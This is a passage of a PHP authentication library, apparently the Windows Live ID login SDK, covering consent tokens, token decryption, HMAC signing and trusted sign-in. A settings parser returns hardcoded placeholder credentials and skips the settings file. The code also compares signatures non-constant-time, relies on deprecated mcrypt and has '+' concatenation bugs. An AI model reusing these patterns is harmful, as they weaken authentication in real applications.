* Gets the list of offers/actions for which the user granted consent.
*/
/*public*/
function getOffers()
{
return $this->_offers;
}
/*private*/
var $_offers_string;
/**
* Gets the string representation of all the offers/actions for which
* the user granted consent.
*/
/*public*/
function getOffersString()
{
return $this->_offers_string;
}
/**
* Sets the offers/actions for which user granted consent.
*/
/*private*/
function setOffers($offers)
{
if (!$offers) {
//throw new Exception('Error: WLL_ConsentToken: Null offers.');
$this->setError('Error: WLL_ConsentToken: Null offers.');
return ;
}
$offers = urldecode($offers);
//Split $offers by ";" and then take only substring before first ":"
if(preg_match_all("/(^|;)([^:;]*)/", $offers, $arMatch))
{
$this->_offers = $arMatch[2];
$this->_offers_string = ltrim(implode(",", $arMatch[2]), ",");
}
else
{
$this->_offers = array();
$this->_offers_string = "";
}
}
/*private*/
var $_locationID;
/**
* Gets the location ID.
*/
/*public*/
function getLocationID()
{
return $this->_locationID;
}
/**
* Sets the location ID.
*/
/*private*/
function setLocationID($locationID)
{
if (!$locationID) {
//throw new Exception('Error: WLL_ConsentToken: Null Location ID.');
$this->setError('Error: WLL_ConsentToken: Null Location ID.');
return ;
}
$this->_locationID = $locationID;
}
/*private*/
var $_context;
/**
* Returns the application context that was originally passed
* to the sign-in request, if any.
*/
/*public*/
function getContext()
{
return $this->_context;
}
/**
* Sets the application context.
*/
/*private*/
function setContext($context)
{
$this->_context = $context;
}
/*private*/
var $_decodedtoken;
/**
* Gets the decoded token.
*/
/*public*/
function getDecodedToken()
{
return $this->_decodedtoken;
}
/**
* Sets the decoded token.
*/
/*private*/
function setDecodedToken($decodedtoken)
{
$this->_decodedtoken = $decodedtoken;
}
/*private*/
var $_token;
/**
* Gets the raw token.
*/
/*public*/
function getToken()
{
return $this->_token;
}
/**
* Sets the raw token.
*/
/*private*/
function setToken($token)
{
$this->_token = $token;
}
/**
* Makes a copy of the ConsentToken object.
*/
/*private*/
function copy($ct)
{
$this->_delegationtoken = $ct->_delegationtoken;
$this->_refreshtoken = $ct->_refreshtoken;
$this->_sessionkey = $ct->_sessionkey;
$this->_expiry = $ct->_expiry;
$this->_offers = $ct->_offers;
$this->_offers_string = $ct->_offers_string;
$this->_locationID = $ct->_locationID;
$this->_decodedtoken = $ct->_decodedtoken;
$this->_token = $ct->_token;
}
var $_error = false;
function setError($str)
{
$this->_error = $str;
}
function getError()
{
if ($this->_error !== false)
{
return $this->_error;
}
}
}
class WindowsLiveLogin
{
/* Implementation of basic methods for Web Authentication support. */
/*private*/
var $_debug = false;
/**
* Stub implementation for logging errors. If you want to enable
* debugging output, set this to true. In this implementation
* errors will be logged using the PHP error_log function.
*/
/*public*/
function setDebug($debug)
{
$this->_debug = $debug;
}
/**
* Stub implementation for logging errors. By default, this
* function does nothing if the debug flag has not been set with
* setDebug. Otherwise, errors are logged using the PHP error_log
* function.
*/
/*private*/
function debug($string)
{
if ($this->_debug) {
echo "$string<br>";
error_log($string);
}
}
/**
* Stub implementation for handling a fatal error.
*/
/*private*/
function fatal($string)
{
WindowsLiveLogin::debug($string);
//throw new Exception($string);
$this->setError($string);
}
/**
* Initialize the WindowsLiveLogin module with the application ID,
* secret key, and security algorithm.
*
* We recommend that you employ strong measures to protect the
* secret key. The secret key should never be exposed to the Web
* or other users.
*
* Be aware that if you do not supply these settings at
* initialization time, you may need to set the corresponding
* properties manually.
*
* For Delegated Authentication, you may optionally specify the
* privacy policy URL and return URL. If you do not specify these
* values here, the default values that you specified when you
* registered your application will be used.
*
* The 'force_delauth_nonprovisioned' flag also indicates whether
* your application is registered for Delegated Authentication
* (that is, whether it uses an application ID and secret key). We
* recommend that your Delegated Authentication application always
* be registered for enhanced security and functionality.
*/
public function __construct(
$appid=null, $secret=null, $securityalgorithm=null,
$force_delauth_nonprovisioned=null,
$policyurl=null, $returnurl=null
)
{
WindowsLiveLogin::setForceDelAuthNonProvisioned($force_delauth_nonprovisioned);
if ($appid) {
WindowsLiveLogin::setAppId($appid);
}
if ($secret) {
WindowsLiveLogin::setSecret($secret);
}
if ($securityalgorithm) {
WindowsLiveLogin::setSecurityAlgorithm($securityalgorithm);
}
if ($policyurl) {
WindowsLiveLogin::setPolicyUrl($policyurl);
}
if ($returnurl) {
WindowsLiveLogin::setReturnUrl($returnurl);
}
}
/**
* Initialize the WindowsLiveLogin module from a settings file.
*
* 'settingsFile' specifies the location of the XML settings file
* that contains the application ID, secret key, and security
* algorithm. The file is of the following format:
*
* <windowslivelogin>
* <appid>APPID</appid>
* <secret>SECRET</secret>
* <securityalgorithm>wsignin1.0</securityalgorithm>
* </windowslivelogin>
*
* In a Delegated Authentication scenario, you may also specify
* 'returnurl' and 'policyurl' in the settings file, as shown in the
* Delegated Authentication samples.
*
* We recommend that you store the WindowsLiveLogin settings file
* in an area on your server that cannot be accessed through the
* Internet. This file contains important confidential information.
*/
/*public static*/
function initFromXml($settingsFile)
{
$o = new WindowsLiveLogin();
$settings = $o->parseSettings($settingsFile);
if (@$settings['debug'] == 'true') {
$o->setDebug(true);
}
else {
$o->setDebug(false);
}
if (@$settings['force_delauth_nonprovisioned'] == 'true') {
$o->setForceDelAuthNonProvisioned(true);
}
else {
$o->setForceDelAuthNonProvisioned(false);
}
$o->setAppId(@$settings['appid']);
$o->setSecret(@$settings['secret']);
$o->setOldSecret(@$settings['oldsecret']);
$o->setOldSecretExpiry(@$settings['oldsecretexpiry']);
$o->setSecurityAlgorithm(@$settings['securityalgorithm']);
$o->setPolicyUrl(@$settings['policyurl']);
$o->setReturnUrl(@$settings['returnurl']);
$o->setBaseUrl(@$settings['baseurl']);
$o->setSecureUrl(@$settings['secureurl']);
$o->setConsentBaseUrl(@$settings['consenturl']);
return $o;
}
/*private*/
var $_appid;
/**
* Sets the application ID. Use this method if you did not specify
* an application ID at initialization.
**/
/*public*/
function setAppId($appid)
{
$_force_delauth_nonprovisioned = $this->_force_delauth_nonprovisioned;
if (!$appid) {
if ($_force_delauth_nonprovisioned) {
return;
}
WindowsLiveLogin::fatal('Error: setAppId: Null application ID.');
}
if (!preg_match('/^\w+$/', $appid)) {
WindowsLiveLogin::fatal("Error: setAppId: Application ID must be alpha-numeric: $appid");
}
$this->_appid = $appid;
}
/**
* Returns the application ID.
*/
/*public*/
function getAppId()
{
if (!$this->_appid) {
WindowsLiveLogin::fatal('Error: getAppId: Application ID was not set. Aborting.');
}
return $this->_appid;
}
/*private*/
var $_signkey;
/*private*/
var $_cryptkey;
/**
* Sets your secret key. Use this method if you did not specify
* a secret key at initialization.
*/
/*public*/
function setSecret($secret)
{
$_force_delauth_nonprovisioned = $this->_force_delauth_nonprovisioned;
if (!$secret || (strlen($secret) < 16)) {
if ($_force_delauth_nonprovisioned) {
return;
}
WindowsLiveLogin::fatal("Error: setSecret: Secret key is expected to be non-null and longer than 16 characters.");
}
$this->_signkey = WindowsLiveLogin::derive($secret, "SIGNATURE");
$this->_cryptkey = WindowsLiveLogin::derive($secret, "ENCRYPTION");
}
/*private*/
var $_oldsignkey;
/*private*/
var $_oldcryptkey;
/**
* Sets your old secret key.
*
* Use this property to set your old secret key if you are in the
* process of transitioning to a new secret key. You may need this
* property because the Windows Live ID servers can take up to
* 24 hours to propagate a new secret key after you have updated
* your application settings.
*
* If an old secret key is specified here and has not expired
* (as determined by the oldsecretexpiry setting), it will be used
* as a fallback if token decryption fails with the new secret
* key.
*/
/*public*/
function setOldSecret($secret)
{
if (!$secret) {
return;
}
if (strlen($secret) < 16) {
WindowsLiveLogin::fatal("Error: setOldSecret: Secret key is expected to be non-null and longer than 16 characters.");
}
$this->_oldsignkey = WindowsLiveLogin::derive($secret, "SIGNATURE");
$this->_oldcryptkey = WindowsLiveLogin::derive($secret, "ENCRYPTION");
}
/*private*/
var $_oldsecretexpiry;
/**
* Sets the expiry time for your old secret key.
*
* After this time has passed, the old secret key will no longer be
* used even if token decryption fails with the new secret key.
*
* The old secret expiry time is represented as the number of seconds
* elapsed since January 1, 1970.
*/
/*public*/
function setOldSecretExpiry($timestamp)
{
if (!$timestamp) {
return;
}
if (!preg_match('/^\d+$/', $timestamp) || ($timestamp <= 0)) {
WindowsLiveLogin::fatal('Error: setOldSecretExpiry Invalid timestamp: '
. $timestamp);
}
$this->_oldsecretexpiry = $timestamp;
}
/**
* Gets the old secret key expiry time.
*/
/*public*/
function getOldSecretExpiry()
{
return $this->_oldsecretexpiry;
}
/*private*/
var $_securityalgorithm;
/**
* Sets the version of the security algorithm being used.
*/
/*public*/
function setSecurityAlgorithm($securityalgorithm)
{
$this->_securityalgorithm = $securityalgorithm;
}
/**
* Gets the version of the security algorithm being used.
*/
/*public*/
function getSecurityAlgorithm()
{
$securityalgorithm = $this->_securityalgorithm;
if (!$securityalgorithm) {
return 'wsignin1.0';
}
return $securityalgorithm;
}
/*private*/
var $_force_delauth_nonprovisioned;
/**
* Sets a flag that indicates whether Delegated Authentication
* is non-provisioned (i.e. does not use an application ID or secret
* key).
*/
/*public*/
function setForceDelAuthNonProvisioned($force_delauth_nonprovisioned)
{
$this->_force_delauth_nonprovisioned = $force_delauth_nonprovisioned;
}
/*private*/
var $_policyurl;
/**
* Sets the privacy policy URL if you did not provide one at initialization time.
*/
/*public*/
function setPolicyUrl($policyurl)
{
$_force_delauth_nonprovisioned = $this->_force_delauth_nonprovisioned;
if (!$policyurl) {
if ($_force_delauth_nonprovisioned) {
WindowsLiveLogin::fatal("Error: setPolicyUrl: Null policy URL given.");
}
}
$this->_policyurl = $policyurl;
}
/**
* Gets the privacy policy URL for your site.
*/
/*public*/
function getPolicyUrl()
{
$policyurl = $this->_policyurl;
$_force_delauth_nonprovisioned = $this->_force_delauth_nonprovisioned;
if (!$policyurl) {
WindowsLiveLogin::debug("Warning: In the initial release of Delegated Auth, a Policy URL must be configured in the SDK for both provisioned and non-provisioned scenarios.");
if ($_force_delauth_nonprovisioned) {
WindowsLiveLogin::fatal("Error: getPolicyUrl: Policy URL must be set in a Del Auth non-provisioned scenario. Aborting.");
}
}
return $policyurl;
}
/*private*/
var $_returnurl;
/**
* Sets the return URL--the URL on your site to which the consent
* service redirects users (along with the action, consent token,
* and application context) after they have successfully provided
* consent information for Delegated Authentication. This value will
* override the return URL specified during registration.
*/
/*public*/
function setReturnUrl($returnurl)
{
$_force_delauth_nonprovisioned = $this->_force_delauth_nonprovisioned;
if (!$returnurl) {
if ($_force_delauth_nonprovisioned) {
WindowsLiveLogin::fatal("Error: setReturnUrl: Null return URL given.");
}
}
$this->_returnurl = $returnurl;
}
/**
* Returns the return URL of your site.
*/
/*public*/
function getReturnUrl()
{
$_force_delauth_nonprovisioned = $this->_force_delauth_nonprovisioned;
$returnurl = $this->_returnurl;
if (!$returnurl) {
if ($_force_delauth_nonprovisioned) {
WindowsLiveLogin::fatal("Error: getReturnUrl: Return URL must be set in a Del Auth non-provisioned scenario. Aborting.");
}
}
return $returnurl;
}
/*private*/
var $_baseurl;
/**
* Sets the base URL to use for the Windows Live Login server.
* You should not have to change this property. Furthermore, we recommend
* that you use the Sign In control instead of the URL methods
* provided here.
*/
/*public*/
function setBaseUrl($baseurl)
{
$this->_baseurl = $baseurl;
}
/**
* Gets the base URL to use for the Windows Live Login server.
* You should not have to use this property. Furthermore, we recommend
* that you use the Sign In control instead of the URL methods
* provided here.
*/
/*public*/
function getBaseUrl()
{
$baseurl = $this->_baseurl;
if (!$baseurl) {
return "http://login.live.com/";
}
return $baseurl;
}
/*private*/
var $_secureurl;
/**
* Sets the secure (HTTPS) URL to use for the Windows Live Login
* server. You should not have to change this property.
*/
/*public*/
function setSecureUrl($secureurl)
{
$this->_secureurl = $secureurl;
}
/**
* Gets the secure (HTTPS) URL to use for the Windows Live Login
* server. You should not have to use this functon directly.
*/
/*public*/
function getSecureUrl()
{
$secureurl = $this->_secureurl;
if (!$secureurl) {
return "https://login.live.com/";
}
return $secureurl;
}
/*private*/
var $_consenturl;
/**
* Sets the Consent Base URL to use for the Windows Live Consent
* server. You should not have to use or change this property directly.
*/
/*public*/
function setConsentBaseUrl($consenturl)
{
$this->_consenturl = $consenturl;
}
/**
* Gets the URL to use for the Windows Live Consent server. You
* should not have to use or change this directly.
*/
/*public*/
function getConsentBaseUrl()
{
$consenturl = $this->_consenturl;
if (!$consenturl) {
return "https://consent.live.com/";
}
return $consenturl;
}
/* Methods for Web Authentication support. */
/**
* Returns the sign-in URL to use for the Windows Live Login server.
* We recommend that you use the Sign In control instead.
*
* If you specify it, 'context' will be returned as-is in the sign-in
* response for site-specific use.
*/
/*public*/
function getLoginUrl($context=null, $market=null)
{
$url = WindowsLiveLogin::getBaseUrl();
$url .= 'wlogin.srf?appid=' . WindowsLiveLogin::getAppId();
$url .= '&alg=' . WindowsLiveLogin::getSecurityAlgorithm();
$url .= ($context ? '&appctx=' . urlencode($context) : '');
$url .= ($market ? '&mkt=' . urlencode($market) : '');
return $url;
}
/**
* Returns the sign-out URL to use for the Windows Live Login server.
* We recommend that you use the Sign In control instead.
*/
/*public*/
function getLogoutUrl($market=null)
{
$url = WindowsLiveLogin::getBaseUrl();
$url .= "logout.srf?appid=" . WindowsLiveLogin::getAppId();
$url .= ($market ? '&mkt=' . urlencode($market) : '');
return $url;
}
/**
* Processes the sign-in response from Windows Live Login server.
*
* @param query contains the preprocessed POST query, a map of
* Strings to an an array of Strings, such as that
* returned by ServletRequest.getParameterMap().
* @return a User object on successful sign-in; otherwise null.
*/
/*public*/
function processLogin($query)
{
$action = @$query['action'];
if ($action != 'login') {
WindowsLiveLogin::debug("Warning: processLogin: query action ignored: $action");
return;
}
$token = @$query['stoken'];
$context = urldecode(@$query['appctx']);
return WindowsLiveLogin::processToken($token, $context);
}
/**
* Decodes and validates a Web Authentication token. Returns a User
* object on success. If a context is passed in, it will be returned
* as the context field in the User object.
*/
/*public*/
function processToken($token, $context=null)
{
if (!$token) {
WindowsLiveLogin::debug('Error: processToken: Invalid token specified.');
return;
}
$decodedToken = WindowsLiveLogin::decodeAndValidateToken($token);
if (!$decodedToken) {
WindowsLiveLogin::debug("Error: processToken: Failed to decode/validate token: $token");
return;
}
$parsedToken = WindowsLiveLogin::parse($decodedToken);
if (!$parsedToken) {
WindowsLiveLogin::debug("Error: processToken: Failed to parse token after decoding: $token");
return;
}
$appid = WindowsLiveLogin::getAppId();
$tokenappid = @$parsedToken['appid'];
if ($appid != $tokenappid) {
WindowsLiveLogin::debug("Error: processToken: Application ID in token did not match ours: $tokenappid, $appid");
return;
}
$user = null;
//try {
$user = new WLL_User(@$parsedToken['ts'],
@$parsedToken['uid'],
@$parsedToken['flags'],
$context, $token);
//} catch (Exception $e) {
if ($user->getError() !== false)
WindowsLiveLogin::debug("Error: processToken: Contents of token considered invalid: " + $user->getError());
//}
return $user;
}
/**
* Returns an appropriate content type and body response that the
* application handler can return to signify a successful sign-out
* from the application.
*
* When a user signs out of Windows Live or a Windows Live
* application, a best-effort attempt is made at signing the user out
* from all other Windows Live applications the user might be signed
* in to. This is done by calling the handler page for each
* application with 'action' set to 'clearcookie' in the query
* string. The application handler is then responsible for clearing
* any cookies or data associated with the sign-in. After successfully
* signing the user out, the handler should return a GIF (any GIF)
* image as response to the 'action=clearcookie' query.
*/
/*public*/
function getClearCookieResponse()
{
$type = "image/gif";
$content = "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7";
$content = base64_decode($content);
return array($type, $content);
}
/* Methods for Delegated Authentication. */
/*
* Returns the consent URL to use for Delegated Authentication for
* the given comma-delimited list of offers.
*
* If you specify it, 'context' will be returned as-is in the consent
* response for site-specific use.
*
* The registered/configured return URL can also be overridden by
* specifying 'ru' here.
*
* You can change the language in which the consent page is displayed
* by specifying a culture ID (For example, 'fr-fr' or 'en-us') in the
* 'market' parameter.
*/
/*public*/
function getConsentUrl($offers, $context=null, $ru=null, $market=null)
{
if (!$offers) {
//throw new Exception('Error: getConsentUrl: Invalid offers list.');
$this->setError('Error: getConsentUrl: Invalid offers list.');
return false;
}
$url = WindowsLiveLogin::getConsentBaseUrl();
$url .= 'Delegation.aspx?ps=' . urlencode($offers);
$ru = ($ru ? $ru : WindowsLiveLogin::getReturnUrl());
$url .= ($ru ? '&ru=' . urlencode($ru) : '');
$pl = WindowsLiveLogin::getPolicyUrl();
$url .= ($pl ? '&pl=' . urlencode($pl) : '');
$url .= ($market ? '&mkt=' . urlencode($market) : '');
if (!$this->_force_delauth_nonprovisioned) {
$url .= '&app=' . WindowsLiveLogin::getAppVerifier();
}
$url .= ($context ? '&appctx=' . urlencode($context) : '');
return $url;
}
/*
* Returns the URL to use to download a new consent token, given the
* offers and refresh token.
*
* The registered/configured return URL can also be overridden by
* specifying 'ru' here.
*/
/*public*/
function getRefreshConsentTokenUrl($offers, $refreshtoken, $ru=null)
{
$_force_delauth_nonprovisioned = $this->_force_delauth_nonprovisioned;
if (!$offers) {
//throw new Exception('Error: getRefreshConsentTokenUrl: Invalid offers list.');
$this->setError('Error: getRefreshConsentTokenUrl: Invalid offers list.');
return false;
}
if (!$refreshtoken) {
//throw new Exception('Error: getRefreshConsentTokenUrl: Invalid refresh token.');
$this->setError('Error: getRefreshConsentTokenUrl: Invalid refresh token.');
return false;
}
$url = WindowsLiveLogin::getConsentBaseUrl();
$url .= 'RefreshToken.aspx?ps=' . urlencode($offers);
$url .= '&reft=' . $refreshtoken;
$ru = ($ru ? $ru : WindowsLiveLogin::getReturnUrl());
$url .= ($ru ? '&ru=' . urlencode($ru) : '');
if (!$this->_force_delauth_nonprovisioned) {
$url .= '&app=' . WindowsLiveLogin::getAppVerifier();
}
return $url;
}
/*
* Returns the URL for the consent-management user interface.
*
* You can change the language in which the consent page is displayed
* by specifying a culture ID (For example, 'fr-fr' or 'en-us') in the
* 'market' parameter.
*/
/*public*/
function getManageConsentUrl($market=null)
{
$url = WindowsLiveLogin::getConsentBaseUrl();
$url .= 'ManageConsent.aspx';
$url .= ($market ? '?mkt=' . urlencode($market) : '');
return $url;
}
/*
* Processes the POST response from the Delegated Authentication
* service after a user has granted consent. The processConsent
* function extracts the consent token string and returns the result
* of invoking the processConsentToken method.
*/
/*public*/
function processConsent($query)
{
$action = @$query['action'];
if ($action != 'delauth') {
WindowsLiveLogin::debug("Warning: processConsent: query action ignored: $action");
return;
}
$responsecode = @$query['ResponseCode'];
if ($responsecode != 'RequestApproved') {
WindowsLiveLogin::debug("Warning: processConsent: consent was not successfully granted: $responsecode");
return;
}
$token = @$query['ConsentToken'];
$context = urldecode(@$query['appctx']);
return WindowsLiveLogin::processConsentToken($token, $context);
}
/*
* Processes the consent token string that is returned in the POST
* response by the Delegated Authentication service after a
* user has granted consent.
*/
/*public*/
function processConsentToken($token, $context=null)
{
if (!$token) {
WindowsLiveLogin::debug('Error: processConsentToken: Null token.');
return;
}
$decodedToken = $token;
$parsedToken = WindowsLiveLogin::parse(urldecode($decodedToken));
if (!$parsedToken) {
WindowsLiveLogin::debug("Error: processConsentToken: Failed to parse token: $token");
return;
}
$eact = @$parsedToken['eact'];
if ($eact) {
$decodedToken = WindowsLiveLogin::decodeAndValidateToken($eact);
if (!$decodedToken) {
WindowsLiveLogin::debug("Error: processConsentToken: Failed to decode/validate token: $token");
return;
}
$parsedToken = WindowsLiveLogin::parse($decodedToken);
if (!$parsedToken) {
WindowsLiveLogin::debug("Error: processConsentToken: Failed to parse token after decoding: $token");
return;
}
$decodedToken = urlencode($decodedToken);
}
$consenttoken = null;
//try {
$consenttoken = new WLL_ConsentToken($this,
@$parsedToken['delt'],
@$parsedToken['reft'],
@$parsedToken['skey'],
@$parsedToken['exp'],
@$parsedToken['offer'],
@$parsedToken['lid'],
$context, $decodedToken, $token);
//} catch (Exception $e) {
if($consenttoken->getError() !== false)
WindowsLiveLogin::debug("Error: processConsentToken: Contents of token considered invalid: " + $consenttoken->getError());
//}
return $consenttoken;
}
/*
* Attempts to obtain a new, refreshed token and return it. The
* original token is not modified.
*/
/*public*/
function refreshConsentToken($token, $ru=null)
{
if (!$token) {
WindowsLiveLogin::debug("Error: refreshConsentToken: Null consent token.");
return;
}
WindowsLiveLogin::refreshConsentToken2($token->getOffersString(), $token->getRefreshToken(), $ru);
}
/*
* Helper function to obtain a new, refreshed token and return it.
* The original token is not modified.
*/
/*public*/
function refreshConsentToken2($offers_string, $refreshtoken, $ru=null)
{
$body = WindowsLiveLogin::fetch(WindowsLiveLogin::getRefreshConsentTokenUrl($offers_string, $refreshtoken, $ru));
if (!$body) {
WindowsLiveLogin::debug("Error: refreshConsentToken2: Failed to obtain a new token.");
return;
}
preg_match('/\{"ConsentToken":"(.*)"\}/', $body, $matches);
if(count($matches) == 2) {
return $matches[1];
}
else {
WindowsLiveLogin::debug("Error: refreshConsentToken2: Failed to extract token: $body");
return;
}
}
/* Common methods. */
/*
* Decodes and validates the token.
*/
/*public*/
function decodeAndValidateToken($token, $cryptkey=null, $signkey=null,
$internal_allow_recursion=true)
{
if (!$cryptkey) {
$cryptkey = $this->_cryptkey;
}
if (!$signkey) {
$signkey = $this->_signkey;
}
$haveoldsecret = false;
$oldsecretexpiry = WindowsLiveLogin::getOldSecretExpiry();
$oldcryptkey = $this->_oldcryptkey;
$oldsignkey = $this->_oldsignkey;
if ($oldsecretexpiry and (time() < $oldsecretexpiry)) {
if ($oldcryptkey and $oldsignkey) {
$haveoldsecret = true;
}
}
$haveoldsecret = ($haveoldsecret and $internal_allow_recursion);
$stoken = WindowsLiveLogin::decodeToken($token, $cryptkey);
if ($stoken) {
$stoken = WindowsLiveLogin::validateToken($stoken, $signkey);
}
if (!$stoken and $haveoldsecret) {
WindowsLiveLogin::debug("Warning: Failed to validate token with current secret, attempting old secret.");
$stoken =
WindowsLiveLogin::decodeAndValidateToken($token, $oldcryptkey, $oldsignkey, false);
}
return $stoken;
}
/**
* Decodes the given token string; returns undef on failure.
*
* First, the string is URL-unescaped and base64 decoded.
* Second, the IV is extracted from the first 16 bytes of the string.
* Finally, the string is decrypted using the encryption key.
*/
/*public*/
function decodeToken($token, $cryptkey=null)
{
if (!$cryptkey) {
$cryptkey = $this->_cryptkey;
}
if (!$cryptkey) {
WindowsLiveLogin::fatal("Error: decodeToken: Secret key was not set. Aborting.");
}
$ivLen = 16;
$token = WindowsLiveLogin::u64($token);
$len = strlen($token);
if (!$token || ($len <= $ivLen) || (($len % $ivLen) != 0)) {
WindowsLiveLogin::debug("Error: decodeToken: Attempted to decode invalid token.");
return;
}
$iv = substr($token, 0, 16);
$crypted = substr($token, 16);
$mode = MCRYPT_MODE_CBC;
$enc = MCRYPT_RIJNDAEL_128;
return mcrypt_decrypt($enc, $cryptkey, $crypted, $mode, $iv);
}
/**
* Creates a signature for the given string by using the signature
* key.
*/
/*public*/
function signToken($token, $signkey=null)
{
if (!$signkey) {
$signkey = $this->_signkey;
}
if (!$signkey) {
WindowsLiveLogin::fatal("Error: signToken: Secret key was not set. Aborting.");
}
if (!$token) {
WindowsLiveLogin::debug("Attempted to sign null token.");
return;
}
if(function_exists('mhash'))
return mhash(MHASH_SHA256, $token, $signkey);
else
return hash_hmac("sha256", $token, $signkey, true);
}
/**
* Extracts the signature from the token and validates it.
*/
/*public*/
function validateToken($token, $signkey=null)
{
if (!$signkey) {
$signkey = $this->_signkey;
}
if (!$token) {
WindowsLiveLogin::debug("Error: validateToken: Invalid token.");
return;
}
$split = explode("&sig=", $token);
if (count($split) != 2) {
WindowsLiveLogin::debug("ERROR: validateToken: Invalid token: $token");
return;
}
list($body, $sig) = $split;
$sig = WindowsLiveLogin::u64($sig);
if (!$sig) {
WindowsLiveLogin::debug("Error: validateToken: Could not extract signature from token.");
return;
}
$sig2 = WindowsLiveLogin::signToken($body, $signkey);
if (!$sig2) {
WindowsLiveLogin::debug("Error: validateToken: Could not generate signature for the token.");
return;
}
if ($sig == $sig2) {
return $token;
}
WindowsLiveLogin::debug("Error: validateToken: Signature did not match.");
return;
}
/* Implementation of the methods needed to perform Windows Live
application verification as well as trusted sign-in. */
/**
* Generates an application verifier token. An IP address can
* optionally be included in the token.
*/
/*public*/
function getAppVerifier($ip=null)
{
$token = 'appid=' . WindowsLiveLogin::getAppId() . '&ts=' . WindowsLiveLogin::getTimestamp();
$token .= ($ip ? "&ip={$ip}" : '');
$token .= '&sig=' . WindowsLiveLogin::e64(WindowsLiveLogin::signToken($token));
return urlencode($token);
}
/**
* Returns the URL that is required to retrieve the application
* security token.
*
* By default, the application security token is generated for
* the Windows Live site; a specific Site ID can optionally be
* specified in 'siteid'. The IP address can also optionally be
* included in 'ip'.
*
* If 'js' is nil, a JavaScript Output Notation (JSON) response is
* returned in the following format:
*
* {"token":"<value>"}
*
* Otherwise, a JavaScript response is returned. It is assumed that
* WLIDResultCallback is a custom function implemented to handle the
* token value:
*
* WLIDResultCallback("<tokenvalue>");
*/
/*public*/
function getAppLoginUrl($siteid=null, $ip=null, $js=null)
{
$url = WindowsLiveLogin::getSecureUrl();
$url .= 'wapplogin.srf?app=' . WindowsLiveLogin::getAppVerifier($ip);
$url .= '&alg=' . WindowsLiveLogin::getSecurityAlgorithm();
$url .= ($siteid ? "&id=$siteid" : '');
$url .= ($js ? '&js=1' : '');
return $url;
}
/**
* Retrieves the application security token for application
* verification from the application sign-in URL.
*
* By default, the application security token will be generated for
* the Windows Live site; a specific Site ID can optionally be
* specified in 'siteid'. The IP address can also optionally be
* included in 'ip'.
*
* Implementation note: The application security token is downloaded
* from the application sign-in URL in JSON format:
*
* {"token":"<value>"}
*
* Therefore we must extract <value> from the string and return it as
* seen here.
*/
/*public*/
function getAppSecurityToken($siteid=null, $ip=null)
{
$body = WindowsLiveLogin::fetch(WindowsLiveLogin::getAppLoginUrl($siteid, $ip));
if (!$body) {
WindowsLiveLogin::debug("Error: getAppSecurityToken: Could not fetch the application security token.");
return;
}
preg_match('/\{"token":"(.*)"\}/', $body, $matches);
if(count($matches) == 2) {
return $matches[1];
}
else {
WindowsLiveLogin::debug("Error: getAppSecurityToken: Failed to extract token: $body");
return;
}
}
/**
* Returns a string that can be passed to the getTrustedParams
* function as the 'retcode' parameter. If this is specified as the
* 'retcode', the application will be used as return URL after it
* finishes trusted sign-in.
*/
/*public*/
function getAppRetCode()
{
return 'appid=' . WindowsLiveLogin::getAppId();
}
/**
* Returns a table of key-value pairs that must be posted to the
* sign-in URL for trusted sign-in. Use HTTP POST to do this. Be aware
* that the values in the table are neither URL nor HTML escaped and
* may have to be escaped if you are inserting them in code such as
* an HTML form.
*
* The user to be trusted on the local site is passed in as string
* 'user'.
*
* Optionally, 'retcode' specifies the resource to which successful
* sign-in is redirected, such as Windows Live Mail, and is typically
* a string in the format 'id=2000'. If you pass in the value from
* getAppRetCode instead, sign-in will be redirected to the
* application. Otherwise, an HTTP 200 response is returned.
*/
/*public*/
function getTrustedParams($user, $retcode=null)
{
$token = WindowsLiveLogin::getTrustedToken($user);
if (!$token) {
return;
}
$token = "<wst:RequestSecurityTokenResponse xmlns:wst=\"http://schemas.xmlsoap.org/ws/2005/02/trust\"><wst:RequestedSecurityToken><wsse:BinarySecurityToken xmlns:wsse=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\">$token</wsse:BinarySecurityToken></wst:RequestedSecurityToken><wsp:AppliesTo xmlns:wsp=\"http://schemas.xmlsoap.org/ws/2004/09/policy\"><wsa:EndpointReference xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"><wsa:Address>uri:WindowsLiveID</wsa:Address></wsa:EndpointReference></wsp:AppliesTo></wst:RequestSecurityTokenResponse>";
$params = array();
$params['wa'] = WindowsLiveLogin::getSecurityAlgorithm();
$params['wresult'] = $token;
if ($retcode) {
$params['wctx'] = $retcode;
}
return $params;
}
/**
* Returns the trusted sign-in token in the format that is needed by a
* control doing trusted sign-in.
*
* The user to be trusted on the local site is passed in as string
* 'user'.
*/
/*public*/
function getTrustedToken($user)
{
if (!$user) {
WindowsLiveLogin::debug('Error: getTrustedToken: Null user specified.');
return;
}
$token = "appid=" . WindowsLiveLogin::getAppId() . "&uid=" . urlencode($user)
. "&ts=". WindowsLiveLogin::getTimestamp();
$token .= "&sig=" . WindowsLiveLogin::e64(WindowsLiveLogin::signToken($token));
return urlencode($token);
}
/**
* Returns the trusted sign-in URL to use for Windows Live Login server.
*/
/*public*/
function getTrustedLoginUrl()
{
return WindowsLiveLogin::getSecureUrl() . 'wlogin.srf';
}
/**
* Returns the trusted sign-in URL to use for Windows Live
* Login server.
*/
/*public*/
function getTrustedLogoutUrl()
{
return WindowsLiveLogin::getSecureUrl() . "logout.srf?appid=" + WindowsLiveLogin::getAppId();
}
/* Helper methods */
/**
* Function to parse the settings file.
*/
/*private*/
function parseSettings($settingsFile)
{
$settings = array(
'appid' => '00163FFF8000E2C5',
'secret' => '12345678901234567890',
'securityalgorithm' => 'wsignin1.0',
);
return $settings;
$doc = new DOMDocument();
if (!$doc->load($settingsFile)) {
WindowsLiveLogin::fatal("Error: parseSettings: Error while reading $settingsFile");
}
$nl = $doc->getElementsByTagName('windowslivelogin');
if($nl->length != 1) {
WindowsLiveLogin::fatal("error: parseSettings: Failed to parse settings file:"
. $settingsFile);
}
$topnode = $nl->item(0);
foreach ($topnode->childNodes as $node) {
if ($node->nodeType == XML_ELEMENT_NODE) {
$firstChild = $node->firstChild;
if (!$firstChild) {
WindowsLiveLogin::fatal("error: parseSettings: Failed to parse settings file:"
. $settingsFile);
}
$settings[$node->nodeName] = $firstChild->nodeValue;
}
}
return $settings;
}
/**
* Derives the key, given the secret key and prefix as described in the
* Web Authentication SDK documentation.
*/
/*private*/
function derive($secret, $prefix)
{
if (!$secret || !$prefix) {
WindowsLiveLogin::fatal("Error: derive: secret or prefix is null.");
}
$keyLen = 16;
$key = $prefix . $secret;
